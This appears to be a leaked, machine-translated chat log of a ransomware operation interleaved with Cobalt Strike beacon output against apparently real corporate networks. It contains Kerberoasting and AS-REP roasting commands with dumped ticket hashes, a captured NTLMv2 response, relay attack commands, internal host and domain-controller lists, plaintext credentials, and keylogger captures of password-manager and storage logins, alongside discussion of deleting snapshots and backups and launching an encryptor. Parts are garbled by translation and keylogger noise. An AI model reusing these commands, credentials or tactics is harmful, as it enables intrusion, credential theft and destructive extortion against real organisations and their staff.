                       5CBC0AACEF3659A640DE0F580834753BAA571D93E7F4A86A046AE3DFD7E0E1392329EB689BB2
                       064261D86233A4E716BB41D746EB1FF9F05DE511CFB2C22B26C37C19238355A9628D14666877
                       377E2EED81032D4C7C852668326027C6CEA4EB71A5DBDFB8B9C66750D9890199A06EC0634D27
                       20084D97C2C040B7A4B1C936C0655AE246B4C172D21852B0BE49041C23A71001AC5518616B84
                       22A7E8276740673CD3B16F7BE8B91441787E6443E13E80BF306F830FEBABE6BF7AFDD894375C
                       850334AAD937DAD89E8F235C0CD2F484431545643456640DE52572B858297A368E166FBCA676
                       C338548666571DBEFA0943C315B5D6A6BD0999CF74E5379E1BB3A1C9ACD9FE030B17EC14E3EB
                       0AEFB88C648B733EE00573C99ABEF2D9FB873757B8933C3D83B9EEFA2AFCFD71602C98014085
                       D9A1AE913818C73CC71358AD2703EA144DA00D82F04BE01FF9E9F29CAC4BB71A599FE81944E2
                       20108C58E7074F9AA8EB38C6F9316DC705F58FF0257106F56E294CF10629D42EF7C2452A3DAE
                       15773D9551B88F737BB5BAAB0A22ABE897FA6028D19EB456B3CCBC9581DB9D5CCE17AC751BCD
                       EE04F61B6C6A71F0C7F29CD2F53898BFE6EA175AC16000BC83A044B14B15F9E8BCAC708B7437
                       4B3DDC020EBD95548986FD1205CAE0F2C1F682EBE126E8222DD9D86A203E700467B63839603A
                       72171BEB96478FC4DCB083D6759EA0FC6E73F5CCC81883EE76154B05BC44EC70A74459A1352A
                       5E868CDCA100A43A1259D8085603C9AE56447210E3FEE5B705F2093E4AB14476778F105D64EF
                       AF331A203D1353C510CAEA32722D1DC8F9A89AAA922199E10FC8DB8B3D9E8A6D3BC3CAC22295
                       3AEBAC87FEA94067A09EF7D815C026DD88E1BF031E00AC631AC832B10C148074A177442BB5C7
                       FA0564B4164315BB7CCE92841915E0C19760AB662EDCAD23F6142D07ED2C0B6CCB5D30196335
                       E5ED37A8659E43521FF52C2A765751A8ABFD4FE70334FE5F64D31EA3B79A34AF1BEACAACC175
                       27304CBC0FDCA29E505D3717B8EA2EF6FC6ADAC01503481A13DAE6A71837588D1295C33A1C56
                       6AC241BF2AFE0865E9E863AAF5BA4AA312E8378442EB271DF0E34B47851D4A571040889C4397
                       C828484498C247770F5D777768A2A3519B42580AD7CDAB2418FC88E7AF0CD4178AD4F99B25C9
                       A54D065239C3A6FFF4D9854CFC7CCF4D8E31F1BA7B679FCB96CCC468668A7EA12A3D4529D264
                       75A8D068FF256C14BA239B940291542D88D5CF07B05978B05CB5C5BBDC2185CDF70FC32B9E0F
                       547D18F935B4ABADE17CBAF463534133925AF2F197B480B8CFDBFDD0C45803F3AD205398DBB7
                       019BA56E0F33039B7CA53B779676CF08A38891B6F992290517AFAD7DD3E4EB0D50ABEBDDE16E
                       AC67076270ED675975ACBCDD
SamAccountName : certsrv
DistinguishedName : CN=certsrv,CN=Users,DC=csez,DC=zohocorpin,DC=com
ServicePrincipalName : http/its-winca.csez.zohocorpin.com


````Invoke-Kerberoast -OutputFormat HashCat | fl | Out-File -FilePath c:\ProgramData\hashes.txt -append -force -encoding UTF8 `translate into a file with hash formatactually it seems that the one you have already given us in Slack you have also discountedlotrettedfu read carefully, enough already) like thishttp://githubcom/EmpireProject/Empire/blob/mob/master/data/module_source/credentials/Invoke-Kerberoast.ps1 give me a link to the invoke kerb with which you shoot the OS
[+] received output:
2020-09-24T00:20:44 - HTTP request for / received from 10.59.0.243

2020-09-24T00:20:44 - HTTP NTLMv2 challenge/response captured from 10.59.0.243 (RAJA-9298):
raja-9298::ZOHOCORP:B3BD81E12761C973:76647C5C0CB37CE1C766147E15568B0B:010100000000000088FC2E71DA91D6018A6E4CF93DBF74F500000000020006004C00410042000100100048004F00530054004E0041004D004500040012006C00610062002E006C006F00630061006C000300240068006F00730074006E0061006D0065002E006C00610062002E006C006F00630061006C00050012006C00610062002E006C006F00630061006C000700080088FC2E71DA91D60106000400020000000800300030000000000000000100000000200000A2CCD58658F72E5537FD61255FEA70627E2DCFE35C6D4C095F02C99AC2A92AD80A001000000000000000000000000000000000000900440048005400540050002F00720061006A0061002D0039003200390038002E006300730065007A002E007A006F0068006F0063006F007200700069006E002E0063006F006D000000000000000000
``````
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/Ghostpack-CompiledBinaries-master/Rubeus.exe asreproast /domain:ru.zohocorpin.com
[*] Tasked beacon to run .NET program: Rubeus.exe asreproast /domain:ru.zohocorpin.com
[+] host called home, sent: 318067 bytes
[+] received output:

   ______ _
  (_____ \ | |
   _____) )_ _| |__ _____ _ _ ___
  | __ /| | | | _ \| ___ | | | |/___)
  | | \ \| |_| | |_) ) ____| |_| |___ |
  |_| |_|____/|____/|_____)____/(___/

  v1.5.0


[*] Action: AS-REP roasting

[*] Target Domain : ru.zohocorpin.com

[*] Searching path 'LDAP://win2k12master.csez.zohocorpin.com/DC=en,DC=zohocorpin,DC=com' for AS-REP roastable users

[+] received output:

[X] Error executing the domain searcher: A referral was returned from the server.

``````
beacon> execute-assembly /home/user/Desktop/cobalt/Signature_Tools/Ghostpack-CompiledBinaries-master/Rubeus.exe asreproast /domain:tsi.zohocorpin.com
[*] Tasked beacon to run .NET program: Rubeus.exe asreproast /domain:tsi.zohocorpin.com
[+] host called home, sent: 318069 bytes
[+] received output:

   ______ _
  (_____ \ | |
   _____) )_ _| |__ _____ _ _ ___
  | __ /| | | | _ \| ___ | | | |/___)
  | | \ \| |_| | |_) ) ____| |_| |___ |
  |_| |_|____/|____/|_____)____/(___/

  v1.5.0


[*] Action: AS-REP roasting

[*] Target Domain : tsi.zohocorpin.com

[*] Searching path 'LDAP://win2k12master.csez.zohocorpin.com/DC=tsi,DC=zohocorpin,DC=com' for AS-REP roastable users

[+] received output:
[X] No users found to AS-REP roast!

``````
beacon> execute-assembly Rubeus.exe kerberoast /domain:ru.zohocorpin.com
[*] Tasked beacon to run .NET program: Rubeus.exe kerberoast /domain:ru.zohocorpin.com
[+] host called home, sent: 320115 bytes
```
it's been like this for about 5 minutes, nothing, I think I'll try again with rubeus?
beacon> psinject 24992 x86 invoke-kerberoast -domain ru.zohocorpin.com | fl
[*] Tasked beacon to psinject: invoke-kerberoast -domain ru.zohocorpin.com | fl into 24992 (x86)
[+] host called home, sent: 125019 bytes
[+] received output:
ERROR: Exception calling "FindAll" with "0" argument(s): "A referral was returned from the server.
ERROR: "
ERROR: At line:990 char:20
ERROR: + else { $Results = $UserSearcher.FindAll() }
ERROR: + ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
ERROR: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
ERROR: + FullyQualifiedErrorId : DirectoryServicesCOMException
ERROR:

``Really?'' I saw it the first time, too. Where's the invoc kerb on trusts? ```
dn:CN=tsi.zohocorpin.com,CN=System,DC=csez,DC=zohocorpin,DC=com
>whenCreated: 2011/11/12-21:30:09 UNKNOWN TZ
>name: tsi.zohocorpin.com
>securityIdentifier: S-1-5-21-485680246-861548126-816136305
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: tsi.zohocorpin.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]

dn:CN=en.zohocorpin.com,CN=System,DC=csez,DC=zohocorpin,DC=com
>whenCreated: 2017/12/31-13:18:45 UNKNOWN TZ
>name: ru.zohocorpin.com
>securityIdentifier: S-1-5-21-923540578-3079758315-1995498360
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: ru.zohocorpin.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]
``Where are the trusts? OK, missed it apparently, never mind, but for future reference again - psinject is better than powerpick:woozy_face:``
beacon> powerpick invoke-kerberoast | fl
[*] Tasked beacon to run: invoke-kerberoast | fl (unmanaged)
[+] host called home, sent: 133715 bytes
[-] could not spawn C:\WINDOWS\sysnative\mstsc.exe: 5
[-] Could not connect to pipe: 2


beacon> psinject 24992 x86 invoke-kerberoast | fl
[*] Tasked beacon to psinject: invoke-kerberoast | fl into 24992 (x86)
[+] host called home, sent: 125019 bytes
[+] received output:


TicketByteHexStream :
Hash : $krb5tgs$http/its-winca.csez.zohocorpin.com:2DE4E99FA6FA6FA68CC689ABB47E0A6F97A
                       $62CF27C5AB593341D3B81B5F5BBCAA82925936965DE779974EE5D9923A4463AB3AAC63712F8
                       AC686D7193085E3B65354BB01B206F486C8DFDAD4531340B194A139C6ACE7BCAEC0E5BFA8F6F
                       056E78530335D087197D488628A16DB5732A440C6AA5E5C3A075F9DD6D35828DD52F49D56DBA
                       F45A7961229719149BF41084852247F8218EF29AD26227013FEAF80446DEE2D7D8B0DE37D6D3
                       8D4E0B6210C5574193987229D4B56BAE3DB0D93BC51CF4EC46F6EDCE0F12F8ADF9A73AD3242E
                       3F727E16CEAE7B5C2A629A6EFAD4C13DF512C7B6E61C818D7CB23E5C229A97A43794559F0FF2
                       58F53EF5C8E9D5D2D70FCBDC531B60C5A883D5618FD4AF4D39ECB105359492C8FA6C7064C9FB
                       DAC355868D6DCCAB5A73BE7C23EFF30F174AE1CCD12A1A5D057B385214B847A625A8ACAAA9E5
                       C5568B7D2D19ED68ACA10685A739E12A758DF6111E9160681618BC37BC24FCCFBA1E6AADFF3C
                       B0F00B635C1E143A84F22E72B27FFD104F589C557DFAF79621014976E4E580B6789A6D97932F
                       0EAEC59393D64A9C1DA4572CDCD6C1F78A16426695EBF51A2C978039B273B4AE0779B3168A7F
                       50CF65541DC98D548907E1C58E04C54F5FF39C27759800CFA8B401A777786F28774BBD01A1AB
                       CC0DEDA88201FB6C11EA6C5F60919803D4F3238ED543B9F4B9B3139D3FF102C72C6DFD1E8DBA
                       C11A46344A45ECA49EB45C70C9431571AA14E7B340CFD54DFC7D290068708EB64EFE74BA3EFE
                       7A292ACAC6DA8E8BB9F0BCEE85D3FE389F854E66AE34587845C063DEE2A0AB6812C3A42CDFE2
                       7494F46E38B41C0BEDEB118A3EFB5ADF2088E92C3B19FCB2211443CFD240A718293B194B0CCF
                       2F3E03DE23E80AA1B025C6881814153E8B747097D07841813372284DA9F49BF6D449036C8741
                       8F19339E029B7119E9BA8400B5AB5834E13D7521403108E24C06B96674D014F1296D9EDCF916
                       2E71FB2786013E934719E2530D9FC854EEFFA748AAB0873F9F923F3AAECF11C2EBE5E79D6CEB
                       F8494096F73BB8A01332CD999FA48D5F92E639C21E62D1AD3B6AA650840AA2370239B806D201
                       0DF25292FF9A23827E3D642EF377BFDEE2E7DD9C6E30C3725C82D4DA58E670AE117A8D649A1F
                       2F6C241B1CED24A5ACD42C153223C3047CCF736CB4503D3659110334A5D3F1B8D477A20D3FC5
                       2A5E82B9211116D511940BE9FC84084A3C09E132570F88C63B0B117E12B596FDA44CD79AD5D7
                       E960C5C41C85DF4C5AEC9A6F728FCC3645DE6548393D1924B0360C406A807449CE7471659221
                       1EB1763E6718A2838761A05ACC8B02418E1DF57E1080F41CB6F5EEA90979BF969BE2EF91826F
                       84C29AA15B0BBD66E83662C4EE9F12F0DEA7F4E128F7FF4324EF999B6A6B4EFA34859BEA6140
                       394AE19A9A1EC83D9A03E2CDDE651262D3033CD846EAACA9E5D6A8D054A1D9A85133875B14B5
                       B64C10A3E7DB5E29E3C99A1101AA50BA231455E0AAC4F69603ABC93379E3404792A65C7A93CE
                       18D5AF6E666FCF9E4B8C28CD22371F71CD349C0D4DA0DB27898065D389491B37B89DD67364EE
                       B82D8F677730EFE646BEB35CE968C0EEBFC7ED5A076F5924AC6ABE5E2D776DC2E49
SamAccountName : certsrv
DistinguishedName : CN=certsrv,CN=Users,DC=csez,DC=zohocorpin,DC=com
ServicePrincipalName : http/its-winca.csez.zohocorpin.com




[*] Hashes have been saved at: /tmp/hashes-kerberoasting.txt
[*] Hashes have been saved at: /tmp/hashes-kerberoasting.txt
Why do you keep using powerpick instead of psinject? I'm writing INVOKE-KERBEROAST, what does this have to do with Invey?
beacon> powerpick Invoke-InveighRelay -ConsoleOutput Y -StatusOutput N -Target 172.20.3.7 -Command "tasklist" -Attack Enumerate,Execute,Session
[*] Tasked beacon to run: Invoke-InveighRelay -ConsoleOutput Y -StatusOutput N -Target 172.20.3.7 -Command "tasklist" -Attack Enumerate,Execute,Session (unmanaged)
[+] host called home, sent: 133715 bytes
[-] Could not connect to pipe: 2
``That's right, so on any error - command and output immediately in the message to the confpowerpick Invoke-InveighRelay -ConsoleOutput Y -StatusOutput N -Target 172.20.3.7 -Command "tasklist" -Attack Enumerate,Execute,SessionPossible I start wrong immediately command -invoke does not work and can work with Rubus)Rubus better
the invoc kerberost on trusts does not work as i remember try to set invoc kerberost on trusts
dn:CN=tsi.zohocorpin.com,CN=System,DC=csez,DC=zohocorpin,DC=com
>whenCreated: 2011/11/12-21:30:09 UNKNOWN TZ
>name: tsi.zohocorpin.com
>securityIdentifier: S-1-5-21-485680246-861548126-816136305
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: tsi.zohocorpin.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]

dn:CN=en.zohocorpin.com,CN=System,DC=csez,DC=zohocorpin,DC=com
>whenCreated: 2017/12/31-13:18:45 UNKNOWN TZ
>name: ru.zohocorpin.com
>securityIdentifier: S-1-5-21-923540578-3079758315-1995498360
>trustDirection: 3 [Inbound(1);Outbound(2)
>trustPartner: ru.zohocorpin.com
>trustType: 2 [UpLevel(2)
>trustAttributes: 8 [Transitive(8)]
``Do you have any dtrusts?'' have done ad_find, seatBelt, ChromeSharp, winpeas, rebeus, Inveit, tried every possible exploit.user9user7user2user1vind 2008
```
hpacc-control.localzoho.com [172.20.3.7]
tally-server.csez.zohocorpin.com [192.168.206.51]
finance-server.csez.zohocorpin.com [192.168.112.132]
est-av-server.csez.zohocorpin.com [192.168.100.68]
print-server-bk.localzoho.com [172.20.3.7]
est-it-storage.csez.zohocorpin.com [192.168.100.74]
printserver.csez.zohocorpin.com [192.168.100.206]
integ-i18n.csez.zohocorpin.com [192.168.113.56]
vcenter.localzoho.com [172.20.3.7]
win2k8adc.localzoho.com [172.20.3.7]
```
https://adsecurity.org/?p=1255НетДА not yet? ``OU=Domain Controllers``
```
ruestadc.localzoho.com [172.20.3.7] (Windows Server 2012 R2 Standard)

tsi-csez-adc.csez.zohocorpin.com [192.168.65.81] (Windows Server 2012 R2 Standard)

est-adc2.csez.zohocorpin.com [192.168.100.93] (Windows Server 2012 R2 Standard)

est-adc.csez.zohocorpin.com [192.168.100.61] (Windows Server 2012 R2 Standard)

win2k12master.csez.zohocorpin.com [192.168.100.27] (Windows Server 2012 R2 Standard)
``\\\CROCKETSTORAGE\D$\Shared\AlloyCrkt01 Data\Shared\MS Outlook PST Backup Utility```
>title: Generic
>title: Network
>title: Systems Administrator
>title: Senior Help Desk & Application Specialist
>title: Network
>title: Maintenance Manager
>title: Maintenance Manager
>title: Production
>title: IT Manager
>title: Lab Manager
>title: Web Designer
>title: Production
>title: QA Manager
>title: Material Handler WH
>title: Production Manager
>title: Inside Sales Person
>title: Planning Specialist
>title: VP Manufacturing, RTP
>title: Engineering Manager
>title: Texas Manufacturing Leader
>title: Network
>title: President
>title: Production
>title: Production
>title: Production
>title: Production
>title: Warehouse
>title: Production Supervisor
>title: Material Handler
>title: Material Handler
>title: Material Handler
>title: Material Handler
>title: Material Handler
>title: Production
>title: Material Operator
>title: Associate Relations Manager
>title: Maintenance Supervisor
>title: Production Supervisor
>title: Material Handler
>title: Production
>title: Production
>title: Maintenance
>title: Production
>title: Maintenance
>title: Lab Technician
>title: Lab Tech
>title: Lab Tech
>title: Receiving
>title: Production Supervisor
>title: Maintenance Lead I & E
>title: Production Supervisor
>title: I & E Technician
>title: Warehouse
>title: Lab Technician
>title: Warehouse
>title: Material Handler
>title: Accounting AP Clerk
>title: President of Operations
>title: Material Handler WH
>title: Training Specialist
>title: Production Supervisor
>title: Tool Room
>title: Shipping & Receiving Coordinator
>title: Tool Room
>title: Mechanic
>title: Operator
>title: Operator
>title: Material Handler
>title: Material Handler
>title: Material Handler
>title: Material Handler
>title: Electrician
>title: Tool Room
>title: Tool Room
>title: Purchasing Coordinator
>title: Maintenance Lead
>title: Lab Tech
>title: Lab Tech
>title: Operator
>title: Mechanic
>title: IT Coordinator
>title: Test User
>title: Production
>title: Lab Tech
>title: Material Handler Receiving
>title: Material Handler WH
>title: Shift Supervisor
>title: Production
>title: Production
>title: Production
>title: Shipping & Receiving Coordinator
>title: Production
>title: Process Engineer
>title: Production Supervisor
>title: Maintenance Material Coordinator
>title: Production Supervisor
>title: Lab Tech
>title: Lab Tech
>title: lab tech
>title: Production Supervisor /QC
>title: Production Supervisor
>title: Quality Lab Assistant
>title: Logistics
>title: Shipping & Receiving
>title: Warehouse Tech
>title: Color Technician
>title: Production Supervisor
>title: IT Manager
>title: Lab Supervisor
>title: Corp. Quality Manager
>title: Production Tech
>title: Operator
>title: Warehouse Tech
>title: Blending Associate
>title: Orange Site Manager
>title: Consultant
>title: Material Handler
>title: Maintenance Tech
>title: Production C Shift
>title: Operator
>title: Material Handler
>title: Operator
>title: Maintenance Supervisor
>title: Maintenance Supervisor
>title: Maintenance
>title: Lab Tech
>title: ToolRoom HandGun
>title: Gah Production
>title: Tool Room
>title: Maintenance
>title: Production
>title: Maintenance
>title: Maintenance
>title: RailRoad
>title: RailRoad
>title: Operator
>title: Office Administrator
>title: Gahanna Lab
>title: Finance Director
>title: Production
>title: Accounting AP Clerk
>title: Finance Director
>title: Verification Tech
>title: Finance Director
>title: Production Tech
>title: Maintenance Tech
>title: Lab Tech
>title: Finance Director
>title: Finance Director
>title: Purchasing
>title: Purchasing
>title: Finance Director
>title: Logistics
>title: Lab Tech\Production
>title: Maintenance Tech
>title: Maintenance Tech
>title: Maintenance Tech
>title: Maintenance Tech
>title: Operator
>title: Housekeeping Tech
>title: Production
>title: Maintenance
>title: Janitorial
>title: Material Handler
>title: Material Handler
>title: Maintenance
>title: Electrician
>title: Material Handler
>title: I & E Technician
>title: Production
>title: Material Handler
>title: Material Handler
>title: Material Handler
>title: Material Handler
>title: Production Supervisor
>title: Warehouse
>title: Office & Associate Relations Manager
>title: Maintenance Leader
>title: Mechanic
>title: Material Handler
>title: Operator
>title: Production Tech
>title: Material Handler
>title: Electrician - Mechanic
>title: Operator
>title: Maintenance Tech
>title: Production Tech
>title: Operator
>title: Lab Tech
>title: Production Tech
>title: Production Tech
>title: Operator
>title: Operator
>title: Electrician
>title: Material Handler
>title: Material Handler
>title: Material Handler
>title: President of Operations
>title: Production Tech
>title: Production Tech
>title: Production Tech
>title: Production Tech
>title: Production Tech
>title: Production Tech
>title: Production Tech
>title: Associate Relations Manager
>title: Maintenance
>title: Production Operator
>title: Production Tech
>title: Production Manager
>title: Production Tech
>title: Material Handler
>title: Material Handler
>title: Lab Tech
>title: Production Tech
>title: Shipping & Receiving
>title: Material Handler
>title: Production Tech
>title: Warehouse
>title: Warehouse
>title: Production Tech
>title: Lab Tech
>title: Material Handler
>title: Material Handler
>title: Operator
>title: Operator
>title: Material Handler
>title: GAHBreak Room
>title: Production
>title: Material Handler
>title: Operator
>title: Warehouse
>title: I & E Technician
>title: Material Handler
>title: Material Handler
>title: Warehouse
>title: Operator
>title: Purchasing
>title: Logistic supervisor backup
>title: Production Tech
>title: Corp. Quality Manager
>title: Operator
>title: Shipping & Receiving Material Handler
>title: Operator
>title: Operator
>title: Operator
>title: Production Tech
>title: Operator
>title: Lab Tech
>title: Production Tech
>title: Material Handler
>title: Material Handler
>title: Housekeeping Tech
>title: Production
>title: Richmond Plant Manager
>title: Production Supervisor
>title: Lab Tech
>title: Production
>title: Symantec
>title: Preventative Maintenance Tech
>title: Verification Tech
>title: Warehouse
>title: Material Handler
>title: Operator
>title: Production Tech
>title: Production Tech
>title: Operator
>title: Operator
>title: Production
>title: Maintenance Tech
>title: Production Tech
>title: Shipping & Receiving
>title: Warehouse
>title: Asset Essentials Work Request
>title: Production Clerk
>title: Warehouse
>title: Warehouse Lead
>title: Operator
>title: Operator
>title: Operator
>title: Operator
>title: QA Technician
>title: Maintenance Supervisor
>title: QA Technician
>title: Production Clerk
>title: Maint Tech
>title: Maint Tech
>title: Maint Tech
>title: Material Handler
>title: Lab Tech
>title: Lab Tech
>title: Warehouse
>title: Lab Tech
>title: Tx Enviromental & Safety
>title: Quality System Specialist
>title: Maintenance
>title: Gah Production
>title: Lab Tech
>title: Lab Tech
>title: Electrician
>title: HR
``I'm going to reset ad_users, I think it's not fullnet, it's ps running through the file manager citra is it rp from citra? how many people in the domain and pc? its not in local and not in ad_users but can run from admin user bbbwalkerjdid you enter through this citra?https://portal.phoen1xasp.com/citrix/accessplatform/auth/login.aspx bbbwalkerj Colorblue76! what is the link local admin? it also happens if you do not guess with the port + Citrix, run the ps from the admin and I use it) ps4? and where did you come from?i have a good night tomorrow at 2session in the slipstream then we'll leave it for tomorrow, is the news not available? the rest tomorrow and if it's past then we'll wait 20 minutes for the domain has not risen? yes, i also have all fallen out of it... but it pings by name...no, he needs to change the ns record, so the computers will see the new dk. if the dns liveauthentication failed? he probably raised the external, so that at least something in the network to work and you can understand what's happening and external dk ips looks like an external ips `https://192.168.0.254/````
Pinging wwdc1.waterway.com [104.130.139.13] with 32 bytes of data:
Reply from 104.130.139.13: bytes=32 time=19ms TTL=50
Reply from 104.130.139.13: bytes=32 time=19ms TTL=50
Reply from 104.130.139.13: bytes=32 time=19ms TTL=50
Reply from 104.130.139.13: bytes=32 time=19ms TTL=50

Ping statistics for 104.130.139.13:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 19ms, Maximum = 19ms, Average = 19ms
```
```
Pinging wwdc2.waterway.com [104.130.139.13] with 32 bytes of data:
Reply from 104.130.139.13: bytes=32 time=19ms TTL=50
Reply from 104.130.139.13: bytes=32 time=19ms TTL=50
Reply from 104.130.139.13: bytes=32 time=19ms TTL=50
Reply from 104.130.139.13: bytes=32 time=19ms TTL=50

Ping statistics for 104.130.139.13:
    Packets: Sent = 4, Received = 4, Lost = 0 (0% loss),
Approximate round trip times in milli-seconds:
    Minimum = 19ms, Maximum = 19ms, Average = 19ms
```
```
9512 beacon> shell net accounts /dom
[*] Tasked beacon to run: net accounts /dom
[+] host called home, sent: 48 bytes
[+] received output:
The request will be processed at a domain controller for domain waterway.com.

System error 1355 has occurred.

The specified domain either does not exist or could not be contacted.
``No autorization is up yetThe whole company is fucked. What's the situation? No autorization is up yet? Is it up yet?
Waterway
11915Wnas2179!
````http://192.168.0.3:5000/ ``192.168.62.30:5000`` and you only wiped nimble? OK, then come here. I thought it was easier for you to share this kind of info off-line. You're not alone here. Why should I send everything to you?
Waterway IT - Agent - Mozilla Firefox
=======
LoveUnit14!
[backspace]
[backspace] so we are hoping [backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace] [backspace][backspace][backspace].

LastPass - Set Master Password - Mozilla Firefox
=======
LoveUnit14[tab]88Maybe253![control][ctrl]a77Maybe253![backspace]*!77Maybe253*!7M*!

My LastPass Vault - Mozilla Firefox
=======
77Maybe253*!
77Maybe253*!


LogMeIn Accounts - Mozilla Firefox
=======
31444895591155163

Waterway Gas & Wash - Mozilla Firefox
=======
77maybe253*!
77Maybe253*!
´´20 min periodjust monitor on the topic of network disconnectiondomain authorization mb will fix))) and watch on the topic? or something else? bitch) youtubchik watchkak their situation? not sure yet found in their downloads one more pst accountant on 223 megabytes@tl1 i will encrypt the admin cars, they have backups there can locally take the files it seems their networka lot we there nabakapili? 1 the fuck for all the cashes support processiongbpltw but will be experienced of course turned out ...+nimble to 0?
We can't sign you in with this credential because your domain isn't available. Make sure your device is connected to your organization's network and try again. If you previously signed in on this device with another credential, you can sign in with that credential.

I'm looking, but there's no such thing as a counterpart of the kazina. You can't restore it by yourself, can you?
beacon> shell net group "domain admins" /dom
[*] Tasked beacon to run: net group "domain admins" /dom
[+] host called home, sent: 61 bytes
[+] received output:
The request will be processed at a domain controller for domain waterway.com.

System error 1355 has occurred.

The specified domain either does not exist or could not be contacted.

is the domain down? is the shara working in parallel only with the token will get in trouble now we'll pull what's pulling and let the buildd go now let it all go
most likely not all unshared because with dk launched bild? orbs and bild one bild by one batton so on the list of armies let but do not start tell me how to run the bild will be snapped by three there start the more the better let a few pieces of armies only armies remained ...if they killed all the servers and will decide from there what to expect, they will now go to nimbly wait for the nimblys then let the armas? + all the virtuals have died? in a hurry once started delete the snaps in any case ahahahahahanet, fuck, looks like all the same on nimblys not snapshotshod we crash the servers along with the volume on the nimblys have crashed?
beacon> shell ping -n 1 192.168.0.192
[*] Tasked beacon to run: ping -n 1 192.168.0.192
[+] host called home, sent: 54 bytes
[+] received output:

Pinging 192.168.0.192 with 32 bytes of data:
Reply from 192.168.0.122: Destination host unreachable.

Ping statistics for 192.168.0.192:
    Packets: Sent = 1, Received = 1, Lost = 0 (0% loss),

``the spare koba''.
173.234.155.15
https://avsix.com
----------------------------------------------------------------------------------------
206.221.188.106:63254
edbDkh6n9sCjfeYJLyFby0q5tKCzuscVSnj
but i can't find it, i can't read it properly, i should have turned it off, but @user4 wrote it, no way did you delete it?[ ](https://mediaeveryone.com/group/waterway-com?msg=mG4g2Ci86s7PZ5c7y) this is what's bothering me, as long as it's connected, it won't let me delete it, did you delete it?ahahahahaha ran pre.bat all over adpogonali guys also three other external backs were? pogonalipognaidak what the fuck, and there and armas will be unshared all i let delete snaps how long will it shake? on 1 ping request could not find the site well fuck with nimin 4 annichable from most hosts + and psek past? on 4 no 445 was 1619 servers was not it?dak their 7 tamas you are operational) and then at the moment erase snaps and startuparms are unsharedSIDH*G&8SDIGvS*DIF^*GSHIGUYRHservers are theretoyou do network but at the moment when the servers will be pulled under 0 i think so too, yes, it is written that snapshots of their virtuals in another place?and inside? nice to find) check the contents of the live ones,just a cluster is not virtuals? all the backups will delete everything?and a maximum of 10 minutes here time is not on the clock to lock or unlock the pc + run pre.bat run the lockerinternaldelete externals all in one moment all in one placeaha ok, the secondParsons smoking is the second? 
waterway.com



WIN SERVER:

by AD: 16
Alive: 11 (including those without 445)
Attracted: 7

no 445:
    PDITESTSQL.waterway.com
    reporting.waterway.com
    WWSQL2Old.waterway.com
    wwsql02.waterway.com

Destination host unreachable (I pinged from different hosts, this is the case everywhere):
    PDIProdWeb2016.waterway.com
    WW2K1Old.waterway.com
    WWSQLOLD.waterway.com
    WATERWAYDSC02.waterway.com



ARMS:

AD: 294
Alive: 200
``When``brandon`` is login`11915Ns2179!!!`` pass from nibble what else on keylog? keylog fucks up some of the characters``setg Proxies socks4:172.93.105.2:48307```115279[tab]1Ns1!1915N29!s17[tab]19N79![tab]115s21!115N219s17[tab]19159!1N179!!11s217s2[tab]195N9!!!No, I'll try it from there, but why are you throwing socks from there? Yeah, did you try the one above?
and all passwords that were this one? 11915ITMan2179! no it does not work check all combinations with his account by username[ ](https://mediaeveryone.com/group/waterway-com?msg=94ftydX3Phhq5H7AG) aha here are usernames+ with a dog in nimble him on the screen at least so blauerbradon you have tried under what? administrator what else is in questionneither this pass did not work? 195N9!! none of them fit?
+) Waterway Gas and Wash | Slack
=======
Nobogi t [backspace]sin nto tnbe[backspace]he imle pls. [backspace] aeI [backspace]I[backspace][backspace] ao [backspace][backspace][backspace][backspace]Im ns[backspace][backspace]s lokIt i ced w [backspace]t[backspace]te momdona [backspace]t hent. [backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace] [backspace][backspace][backspace][backspace] [backspace] [backspace] [backspace] [backspace]tr [backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace] y toI o [backspace][backspace]kowdnt't n who s calliait bing bout yt i doesma nyI[backspace]u not kea sense.   it isathink [backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace][backspace] [backspace][backspace] oensmoeTis[backspace][backspace][backspace] o[backspace
 I [backspace][backspace]t[backspace]It sdl[backspace][backspace][backspace]p[backspace][backspace][backspace][backspace]founs ik[backspace]his[backspace][backspace][backspace][backspace][backspace]e fih[backspace][backspace]elss[backspace]phicyisyto meTer wo[backspace]h[backspace][backspace][backspace]s[backspace]h . heud noreal be s[backspace]ftem d[backspace]all. on or h to comeoeoc. I a[backspace]sn t allv[backspace]vloehae ckdtnfrn i dow o ow.


New Tab - Google Chrome
=======
.8

New Tab - Google Chrome
=======
19216.0.75



=======
m[backspace][backspace]


=======
nibil[backspace]e[backspace][backspace][backspace][backspace][backspace]19218[backspace][backspace][backspace][backspace].60.7[backspace][backspace][backspace].755[backspace]0.2[backspace]

192.168.0.75 - Nimble Storage - Google Chrome
=======
91

192.168.0.75 - Nimble Storage - Google Chrome
=======
115279[tab]1Ns1!1915N29!!s17[tab]19N79![tab]115s21!115N219s17[tab]19159!1N179!!11s217s2[tab]195N9!!

New Tab - Google Chrome
=======
192.

New Tab - Google Chrome
=======



Privacy error - Google Chrome
=======
192

BdTrayInvWindow
=======
[alt]

BdTrayInvWindow
=======
[alt]

Cortana
=======
e

Cortana
=======
not


Untitled - Notepad
=======
[ctrl]v

Untitled - Notepad
=======
[control]

(+) Waterway Gas and Wash | Slack
=======
Wa C

(+) Waterway Gas and Wash | Slack
=======
